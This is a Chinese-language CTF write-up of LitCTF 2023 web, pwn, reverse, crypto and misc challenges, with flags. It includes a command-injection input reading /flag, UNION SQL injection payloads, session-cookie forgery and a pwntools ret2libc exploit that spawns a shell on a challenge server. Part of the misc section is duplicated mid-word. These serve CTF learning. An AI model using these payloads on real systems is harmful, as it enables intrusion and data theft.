password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=cat /flag

​ flag:NSSCTF{550f422b-6b60-4216-828a-4521b82fe56f}

10、这是什么?SQL !注一下 !

​ 发现给了一句源码:


$sql = "SELECT username,password FROM users WHERE id = ".'(((((('.$_GET["id"].'))))))';$result = $conn->query($sql);

​ 由于前半部分存在多个(,因此后边需要对括号进行闭合,之后和寻常的sql注入一样:

​ 查数据库:

?id=1))))))union select 1,group_concat(schema_name) from information_schema.schemata--+

​ 查表:

?id=1))))))union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctftraining'--+

​ 查字段名:

?id=1))))))union select 1,group_concat(column_name) from information_schema.columns where table_schema='ctftraining'--+

​ 查flag:NSSCTF{d97bb244-e6e7-4ee9-b764-2a28571532e5}

?id=1))))))union select 1,flag from ctftraining.flag--+

11、Flag点击就送!

​ 随便输入一个1,之后提示只有管理员能进,应该是Cookie伪造,那么看一下Cookie,

session=eyJuYW1lIjoiMSJ9.Zmbx8g.9zpH8poegrPcOfauIe1GtO1ht64

​ 应该是session伪造,猜测key为LitCTF,修改1为admin,最后拿到flag:NSSCTF{fdbe1619-9458-4e89-84fa-6e9b308e5507}

Pwn:

1、只需要nc一下~

​ 呜呜呜,这个题我竟然懵逼了,最后发现是在环境变量中 (>_<)。

​ 直接nc之后echo $FLAG即可获得flag:NSSCTF{548baafa-2de1-41c7-aafe-29b90be4f940}

2、口算题卡

​ nc连接之后发现是一个加减法运算(?)

root@MSI:/mnt/c/Users/20820/Downloads# nc node4.anna.nssctf.cn 28007__           ________      _________   ______       _________   ______
/_/\         /_______/\    /________/\ /_____/\     /________/\ /_____/\
\:\ \        \__.::._\/    \__.::.__\/ \:::__\/     \__.::.__\/ \::::_\/_\:\ \          \::\ \        \::\ \    \:\ \  __      \::\ \    \:\/___/\\:\ \____     _\::\ \__      \::\ \    \:\ \/_/\      \::\ \    \:::._\/\:\/___/\   /__\::\__/\      \::\ \    \:\_\ \ \      \::\ \    \:\ \\_____\___________________   \__\_____ \_____\______  \__\/     \_\//_____/\     /_____/\     /_____/\     /_____/\\:::_:\ \    \:::_ \ \    \:::_:\ \    \:::_:\ \_\:\|     \:\ \ \ \       _\:\|       /_\:\ \_______     /::_/__     \:\ \ \ \     /::_/__      \::_:\ \
/______/\    \:\____/\    \:\_\ \ \    \:\____/\    /___\:\ '
\__::::\/     \_____\/     \_____\/     \_____\/    \______/Welcome to the LitCTF2023 Verbal Problem Card!
You will be presented with 100 addition and subtraction problems.
Your goal is to answer all of them correctly to get the flag!
if you wrong, you will be kicked out of the game.
Good luck & Have fun!

​ 推测需要加减到一定数目才会出flag,试试吧,exp如下:

from pwn import *io = remote("node4.anna.nssctf.cn",28007)io.recvuntil(b"Have fun!\n")for i in range(100):io.recvuntil(b"What is")key = io.recvuntil(b"?")payload = flat([str(eval(key[:-1]))])print(eval(key[:-1]))io.sendline(payload)io.interactive()

​ 最后得到flag:Congratulations! Here’s your flag:NSSCTF{757d9dc8-d946-4f97-9370-63876e41aeaf}

3、狠狠的溢出涅~

​ 检查保护:

root@MSI:/mnt/c/Users/20820/Downloads/ubuntu_pwn# checksec pwn4
[*] '/mnt/c/Users/20820/Downloads/ubuntu_pwn/pwn4'Arch:     amd64-64-littleRELRO:    Partial RELROStack:    No canary foundNX:       NX enabledPIE:      No PIE (0x400000)

​ IDA 反编译;

int __fastcall main(int argc, const char **argv, const char **envp)
{char buf[91]; // [rsp+10h] [rbp-60h] BYREFunsigned __int8 v5; // [rsp+6Bh] [rbp-5h]int v6; // [rsp+6Ch] [rbp-4h]v6 = 0;setbuf(stdin, 0LL);setbuf(stdout, 0LL);setbuf(stderr, 0LL);puts("Leave your message:");read(0, buf, 0x200uLL);v5 = strlen(buf);if ( v5 > 0x50u ){puts("hacker");exit(0);}puts("Ok,Message Received");return 0;
}

​ 发现存在栈溢出漏洞,但是,也存在过滤,就是获取buf的大小,然后与0x50u进行大小比较,没有后门函数,那么就是个ret2libc,直接套公式做了。

​ 先通过puts函数泄露puts函数本身的真实地址,之后通过libc文件或者LibcSearcher库查版本拿system和/bin/sh的地址,exp如下:

from pwn import *context (os='linux', arch='amd64', log_level='debug')
context.terminal = ['tmux','splitw','-h','-l','140']pwnfile = './pwn4'
elf = ELF(pwnfile)
libc = ELF('./libc-2.31.so')#io = process(pwnfile)
io = remote('node4.anna.nssctf.cn',28607)#gdb.attach(io)pop_rdi = 0x4007d3
pop_ret = 0x400556
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = 0x4006B0
pay = b'\x00' * (0x60+8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
io.sendlineafter('message:\n', pay)puts_addr = u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
libc_base = puts_addr - libc.sym['puts']
system_addr = libc_base + libc.symbols['system']
bin_sh = libc_base + next(libc.search('/bin/sh\x00'))
pay2 = b'\x00' * (0x68) + p64(pop_ret) + p64(pop_rdi) + p64(bin_sh) + p64(system_addr)
io.recvuntil("message:")
io.sendline(pay2)io.interactive()

​ flag:NSSCTF{u_r_master_of_stackoverflow_and_intoverflow}

Re:

1、世界上最棒的程序员

​ shift+f12直接找到flag:Flag: LitCTF{I_am_the_best_programmer_ever}

2、ez_XOR:

​ 直接上源码:

int __cdecl main(int argc, const char **argv, const char **envp)
{int v4; // [esp+0h] [ebp-80h]const char **v5; // [esp+4h] [ebp-7Ch]const char **v6; // [esp+8h] [ebp-78h]char Str1[50]; // [esp+1Ch] [ebp-64h] BYREFchar Str2[26]; // [esp+4Eh] [ebp-32h] BYREF__int16 v9; // [esp+68h] [ebp-18h]int v10; // [esp+6Ah] [ebp-16h]int v11; // [esp+6Eh] [ebp-12h]int v12; // [esp+72h] [ebp-Eh]int v13; // [esp+76h] [ebp-Ah]int v14; // [esp+7Ah] [ebp-6h]__int16 v15; // [esp+7Eh] [ebp-2h]__main();strcpy(Str2, "E`}J]OrQF[V8zV:hzpV}fVF[t");v9 = 0;v10 = 0;v11 = 0;v12 = 0;v13 = 0;v14 = 0;v15 = 0;printf("Enter The Right FLAG:");scanf("%s", Str1);XOR(Str1, 3);if ( !strcmp(Str1, Str2) ){printf("U Saved IT!\n");return 0;}else{printf("Wrong!Try again!\n");return main(v4, v5, v6);}
}

​ XOR函数如下:

size_t __cdecl XOR(char *Str, char a2)
{size_t result; // eaxunsigned int i; // [esp+2Ch] [ebp-Ch]for ( i = 0; ; ++i ){result = strlen(Str);if ( i >= result )break;Str[i] ^= 3 * a2;}return result;
}

​ 那么,大致可以知道了,E`}J]OrQF[V8zV:hzpV}fVF[t字段与9进行异或运算,所以,可以写出如下exp:

a = "E`}J]OrQF[V8zV:hzpV}fVF[t"
b = ""
for i in a:c = ord(i) ^ 9b += chr(c)
print(b)

​ flag:LitCTF{XOR_1s_3asy_to_OR}

3、enbase64

​ 打断点动态调试一下。然后就能看到source:gJ1BRjQie/FIWhEslq7GxbnL26M4+HXUtcpmVTKaydOP38of5v90ZSwrkYzCAuND

​ 解码即可,再看basecheck(Str1)中有str1的值,然后base64解码即可:

​ flag:LitCTF{B@5E64_l5_tooo0_E3sy!!!}

Crypto:

1、梦想是红色的 (初级)

自由友善公正公正敬业法治自由自由和谐平等自由自由公正法治诚信民主诚信自由自由诚信民主爱国友善平等诚信富强友善爱国自由诚信民主敬业爱国诚信民主友善爱国平等爱国爱国敬业敬业友善爱国公正敬业爱国敬业和谐文明诚信文明友善爱国自由诚信民主爱国爱国诚信和谐友善爱国自由友善平等爱国友善平等友善自由诚信自由平等爱国爱国敬业敬业友善爱国敬业敬业友善自由友善平等诚信自由法治诚信和谐

​ 一眼社会主义核心价值观加密,无脑梭:LitCTF{为之则易,不为则难}

2、Hex?Hex!(初级)

4c69744354467b746169313131636f6f6c6c616161217d

​ 提示hex了,无脑十六进制解密:LitCTF{tai111coollaaa!}

3、你是我的关键词(Keyworld) (初级)

IFRURC{X0S_YP3_JX_HBXV0PA}

​ 关键字加密,key是YOU,提示很明显:LITCTF{Y0U_AR3_MY_KEYW0RD}

4、家人们!谁懂啊,RSA签到都不会 (初级)

from Crypto.Util.number import *
from secret import flagm = bytes_to_long(flag)
p = getPrime(512)
q = getPrime(512)
e = 65537
n = p*q
c = pow(m,e,n)
print(f'p = {p}')
print(f'q = {q}')
print(f'c = {c}')
'''
p = 12567387145159119014524309071236701639759988903138784984758783651292440613056150667165602473478042486784826835732833001151645545259394365039352263846276073
q = 12716692565364681652614824033831497167911028027478195947187437474380470205859949692107216740030921664273595734808349540612759651241456765149114895216695451
c = 108691165922055382844520116328228845767222921196922506468663428855093343772017986225285637996980678749662049989519029385165514816621011058462841314243727826941569954125384522233795629521155389745713798246071907492365062512521474965012924607857440577856404307124237116387085337087671914959900909379028727767057
'''

​ 大佬直接用工具一把梭GitHub - spmonkey/Crypto 直接工具直接解密即可,我不知为啥下载不了这个工具,所以直接上答案了:

​ flag:LitCTF{it_is_easy_to_solve_question_when_you_know_p_and_q}

Misc;

1、What_1s_BASE (初级)

TGl0Q1RGe0tGQ19DcjR6eV9UaHVyM2RheV9WX21lXzUwfQ==

​ 直接base64解码即可:LitCTF{KFC_Cr4zy_Thur3day_V_me_50}

2、404notfound (初级)

​ 一张图片,记事本打开,前几行有flag:LitCTF{Its_404_but_1ts_n0t_a_page}

3、这羽毛球怎么只有一半啊(恼 (初级)

​ 拖到010里修改高度,之后得到flag:LitCTF{Fl4g_0fcourse!}

4、喜欢我的压缩包么 (初级)

​ 提示压缩包密码是6位数字,直接爆破解出密码是114514,好臭的密码:LitCTF{Do-u-like-my-zip-p4ck?}

5、Take me hand (初级)

​ 流量包分析,随便追踪一个http,在请求的POST数据中找到flag,经过url解码之后得到:LitCTF{Give_y0ur_hand_to_me!!!_plz}

6、破损的图片(初级)

​ 文件用010editor编辑,添上%png…,也就是89504E470D0A1A0A,再将图片重命名为.png图片,打开图片便是flag:LitCTF{May you, the beauty of this world, always shine.}

7、Osint小麦果汁

​ 我tm,想暴打出题人,算了,忍忍。

​ 上面看到一个很明显的字符,看起来像是wifi名,hacker&craft,直接在百度地图搜索黑客,发现了一个名字,黑客与精酿,flag:LitCTF{黑客与精酿}

8、easy_shark

​ 又是个欺负我010有问题,真服了,想暴打出题人。

​ 还是说下思路就行了吧,拖进010,修改 90 00 为 00 00即可,然后不用密码解压,追踪http流,在多个http流中找到了一个php一句话木马,然后再找,第五十几个就能找到个方程,然后两个key,应该是仿射密码,以及#后面是一个字符串,格式很想flag。之后仿射密码解决:LitCTF{w13e5hake_1s_a_900d_t3a771c_t001_a}

9、OSINT 探姬去哪了?_0

​ 又是社工 (T^T):

otfound (初级)

​ 一张图片,记事本打开,前几行有flag:LitCTF{Its_404_but_1ts_n0t_a_page}

3、这羽毛球怎么只有一半啊(恼 (初级)

​ 拖到010里修改高度,之后得到flag:LitCTF{Fl4g_0fcourse!}

4、喜欢我的压缩包么 (初级)

​ 提示压缩包密码是6位数字,直接爆破解出密码是114514,好臭的密码:LitCTF{Do-u-like-my-zip-p4ck?}

5、Take me hand (初级)

​ 流量包分析,随便追踪一个http,在请求的POST数据中找到flag,经过url解码之后得到:LitCTF{Give_y0ur_hand_to_me!!!_plz}

6、破损的图片(初级)

​ 文件用010editor编辑,添上%png…,也就是89504E470D0A1A0A,再将图片重命名为.png图片,打开图片便是flag:LitCTF{May you, the beauty of this world, always shine.}

7、Osint小麦果汁

​ 我tm,想暴打出题人,算了,忍忍。

​ 上面看到一个很明显的字符,看起来像是wifi名,hacker&craft,直接在百度地图搜索黑客,发现了一个名字,黑客与精酿,flag:LitCTF{黑客与精酿}

8、easy_shark

​ 又是个欺负我010有问题,真服了,想暴打出题人。

​ 还是说下思路就行了吧,拖进010,修改 90 00 为 00 00即可,然后不用密码解压,追踪http流,在多个http流中找到了一个php一句话木马,然后再找,第五十几个就能找到个方程,然后两个key,应该是仿射密码,以及#后面是一个字符串,格式很想flag。之后仿射密码解决:LitCTF{w13e5hake_1s_a_900d_t3a771c_t001_a}

9、OSINT 探姬去哪了?_0

​ 又是社工 (T^T):

​ 根据属性中的经纬度找到了一个地方,嘉兴市秀洲区,然后高德地图搜索"嘉兴市秀洲区 电信",出现的是电信大厦,所以:LitCTF{中国电信大厦}

这篇关于【2023】LitCTF的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1049738

相关文章

CSP 2023 提高级第一轮 CSP-S 2023初试题 完善程序第二题解析 未完

一、题目阅读 (最大值之和)给定整数序列 a0,⋯,an−1,求该序列所有非空连续子序列的最大值之和。上述参数满足 1≤n≤105 和 1≤ai≤108。 一个序列的非空连续子序列可以用两个下标 ll 和 rr(其中0≤l≤r<n0≤l≤r<n)表示,对应的序列为 al,al+1,⋯,ar​。两个非空连续子序列不同,当且仅当下标不同。 例如,当原序列为 [1,2,1,2] 时,要计算子序列 [

HNU-2023电路与电子学-实验3

写在前面: 一、实验目的 1.了解简易模型机的内部结构和工作原理。 2.分析模型机的功能,设计 8 重 3-1 多路复用器。 3.分析模型机的功能,设计 8 重 2-1 多路复用器。 4.分析模型机的工作原理,设计模型机控制信号产生逻辑。 二、实验内容 1.用 VERILOG 语言设计模型机的 8 重 3-1 多路复用器; 2.用 VERILOG 语言设计模型机的 8 重 2-1 多

2023 CCPC(秦皇岛)现场(第二届环球杯.第 2 阶段:秦皇岛)部分题解

所有题目链接:Dashboard - The 2023 CCPC (Qinhuangdao) Onsite (The 2nd Universal Cup. Stage 9: Qinhuangdao) - Codeforces 中文题面: contest-37054-zh.pdf (codeforces.com) G. Path 链接: Problem - G - Codeforces

HNU-2023电路与电子学-实验1

写在前面: 这是电路与电子学课程的第一次实验,按照指导书的需求在Multisim软件搭建一个电路传感器模型,难度较小,细心完成就没有问题。 小tips:22级实验是采用上传到测试平台来进行功能检测,如果不通过则会打回修改后再重新提交,(我们那时候的评测系统特别特别慢,一次只能测一个同学,剩下同学就排队等着,久的时候甚至超过10个小时),这里列举一个常见的错误:热噪声有+号这端需要连接有源滤波器

【python】—— Python爬虫实战:爬取珠海市2011-2023年天气数据并保存为CSV文件

目录 目标 准备工作 爬取数据的开始时间和结束时间 爬取数据并解析 将数据转换为DataFrame并保存为CSV文件         本文将介绍如何使用Python编写一个简单的爬虫程序,以爬取珠海市2011年至2023年的天气数据,并将这些数据保存为CSV文件。我们将涉及到以下知识点: 使用requests库发送HTTP请求使用lxml库解析HTML文档使用dateti

Acrobat Pro DC 2023 for Mac/Win:全能型PDF编辑器深度解析

Adobe Acrobat Pro DC 2023作为一款跨平台的PDF编辑器,无论是对于Mac还是Windows用户,都提供了极为全面且强大的PDF处理功能。该软件凭借其卓越的性能和丰富的特性,成为了全球范围内用户处理PDF文档的首选工具。 一、强大的编辑功能 Acrobat Pro DC 2023内置了多种编辑工具,如文本编辑器、图片替换、页面调整等,使用户能够轻松地对PDF文档进行修改和

【行业报告】2023年消除类手游全球市场洞察

​更多消除内容: 长线消除游戏商业化设计案例:《梦幻花园》 - 游戏干饭之家 谈谈《开心消消乐》是如何做游戏商业化活动 - 游戏干饭之家 消除游戏展现了从简单的游戏玩法到复杂的社交互动,再到精细化运营的发展历程,其通过不断的创新和适应现代游戏的市场变化,依然活跃在市场的前沿 一、消除游戏分类定义 二、消除手游市场现状分析 消除手游近两年下载量增速表现优于整体手游表现,下

【数据分享】2000—2023年我国省市县三级逐月归一化植被指数(NDVI)数据(Shp/Excel格式)

之前我们分享过2000—2023年逐月归一化植被指数(NDVI)栅格数据(可查看之前的文章获悉详情),该数据来源于NASA定期发布的MOD13A3数据集!很多小伙伴拿到数据后反馈栅格数据不太方便使用,问我们能不能把数据处理为更方便使用的Shp和Excel格式的数据! 我们特地对数值在-0.2—1之间的NDVI栅格数据进行了处理,将2000-2023年逐月的归一化植被指数栅格分别按照我国省级行政边

Update Azure OpenAI npm Package to 2023-12-01-preview Version

题意:将 Azure OpenAI npm 包更新到 2023-12-01-preview 版本 问题背景: I am currently using the azure-openai npm package in my project with version 2023-03-15-preview. As per the latest updates, version 2023-12

[SWPUCTF 2023 秋季新生赛]Pingpingping

这种是ctf中比较简单的一类题,主要解法基本上也就那些形式。 这道题我给它提出来主要是涉及了一下比较零散的知识点,觉得想要跟大家分享一下。 <?phphighlight_file(__FILE__);error_reporting(0);$_ping = $_GET['Ping_ip.exe'];if(isset($_ping)){system("ping -c 3 ".$_ping)